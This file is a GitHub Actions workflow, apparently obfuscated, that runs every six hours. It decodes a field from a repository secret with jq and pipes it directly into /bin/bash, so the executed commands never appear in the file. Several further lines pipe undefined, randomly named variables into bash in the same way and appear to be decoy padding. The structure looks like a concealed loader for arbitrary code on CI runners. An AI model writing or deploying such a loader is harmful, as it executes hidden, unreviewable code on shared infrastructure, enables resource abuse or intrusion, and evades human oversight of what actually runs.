name: xiangzhejinhuan
on:
  workflow_dispatch:
  schedule:
    - cron: '32 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiangzhejinhuan
        env:
          k97: ${{ secrets.k97 }}
        run: |
          echo $k97 | jq -r .c18 | /bin/bash
          echo $qhmbu7378 | jq -r .epko99235 | /bin/bash
          echo $m264 | jq -r .hdbd7580 | /bin/bash
          echo $hf6 | jq -r .vcg8 | /bin/bash
          echo $zvn71 | jq -r .xuagn42808 | /bin/bash
          echo $tiibh5766 | jq -r .rzqxw28701 | /bin/bash
          echo $elkb78 | jq -r .ukbkh9728 | /bin/bash

